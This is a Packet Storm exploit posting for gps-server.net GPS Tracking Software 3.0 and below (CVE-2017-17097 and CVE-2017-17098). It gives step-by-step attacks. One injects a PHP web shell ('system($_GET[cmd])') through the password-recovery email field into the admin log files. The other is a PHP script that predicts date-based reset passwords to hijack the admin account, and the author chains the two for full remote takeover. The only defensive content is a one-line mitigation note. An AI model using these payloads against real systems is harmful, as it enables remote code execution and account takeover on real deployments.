exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

gps-server.net GPS Tracking Software 3.0 Code Injection / Password Reset

gps-server.net GPS Tracking Software 3.0 Code Injection / Password Reset
Posted Jan 6, 2018
Authored by Noman Riffat

gps-server.net GPS Tracking Software versions 3.0 and below suffer from remote code injection and password reset vulnerabilities.

tags | exploit, remote, vulnerability
advisories | CVE-2017-17097, CVE-2017-17098
SHA-256 | 30c0124c400a1693d0e840a795c18cda62cc1a17ed81aca850c7e1dbd36eb1da

gps-server.net GPS Tracking Software 3.0 Code Injection / Password Reset

Change Mirror Download
# Exploit Title: GPS-SERVER.NET SAAS CMS <=3.0 Multiple Vulnerabilities
# Exploit Author: Noman Riffat
# Vendor Homepage: http://www.gps-server.net/
# Software Link: http://www.gps-server.net/
# Version: <=3.0
# Tested on: Linux and Windows
# CVE : CVE-2017-17097, CVE-2017-17098

GPS-SERVER.NET SAAS CMS Version <=3.0 Suffers from multiple vulnerabilities
which results in complete takeover of the target remotely.

1. Remote Code Injection (Works until version 3.0)

The writeLog function in fn_common.php in gps-server.net GPS Tracking
Software (self hosted) through 3.0 allows remote attackers to inject
arbitrary PHP code via a crafted request that is mishandled during admin
log viewing. Login, signup and other common incidents are logged into a PHP
file in /logs/ directory with the given input. For example an attacker can
use PHP code in password recovery mode instead of email which will be
injected into the PHP log file.

Demo:

Go to the vulnerable site
Click recover tab
Give following code in email field, fill captcha and click submit
<?php system($_GET[cmd]); ?>
Unfortunately each and every POST request in the CMS is going through
function mysql_real_escape_string() which will add slashes behind every
quote in the payload. So you have to make sure your payload doesn't contain
any quote. Fortunately, PHP is flexible enough to allow a string without
having quotes as you can see in above payload it doesn't contain quotes
around "cmd" but it still works. The shell can then be collected from here
https://localhost/logs/YYYY_MM_user_access.php
YYYY=Current Year
MM=Current Month
Use the payload carefully. If you messed it up, PHP log file will get
corrupted and then wait until next month so CMS generates a new log file
for you :)
Unfortunately the header of log files only allows admin session to access
log data which makes it less of a RCE. Code will only be executed if admin
checks the log files. But fortunately there is another vulnerability
(explained below) which allows an attacker to hijack admin's account hence
making the RCE exploitable with 100% success.

2. Password Reset Vulnerability (Tested upto version 2.7)

gps-server.net GPS Tracking Software (self hosted) 2.x has a password reset
procedure that immediately resets passwords upon an unauthenticated
request, and then sends e-mail with a predictable (date-based) password to
the admin, which makes it easier for remote attackers to obtain access by
predicting this new password. This is related to the use of gmdate()
function for password creation in fn_connect.php.

Demo:

Go to the vulnerable site
Click recover tab
Input admin's email, fill captcha and click submit. Now execute following
PHP code on your local machine immediately.

<?php
for($seconds=-10;$seconds<10;$seconds++){
echo substr(hash('sha1',gmdate('d F Y G i s u',
time()+$seconds)),0,6).'<br>';
}
?>

Submitting password reset form and executing above should be done parallel
to predict password as close as possible. Unfortunately i couldn't make
full remote exploit because of the captcha in the password reset form. This
code will predict possible 20 passwords generated in 20 seconds. It might
not be possible to have synchronized timing on your local machine and
target's server so this code generates 20 passwords (10 before actual time
and 10 after). Set your local machine's time as accurate as you can to get
the perfect combo :)
Password reset vulnerability is tested up to version 2.7 but doesn't work
on version 3.0 which means it was fixed somewhere in between version 2.7
and 3.0 and since the CMS isn't open source so I can't say when it got
fixed (I only had source code of version 2.5.9 and 2.7). Even though the
reset vulnerability was patched unintentionally as developers added a
mid-step in password reset procedure. CMS sends password reset link to the
admin's email and password is only reset once admin clicks the link. Since
we don't know when admin is gonna click the link so we can't predict the
new password.

Mitigation: Update CMS to version 3.1

Give me feedback @nomanriffat :)

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close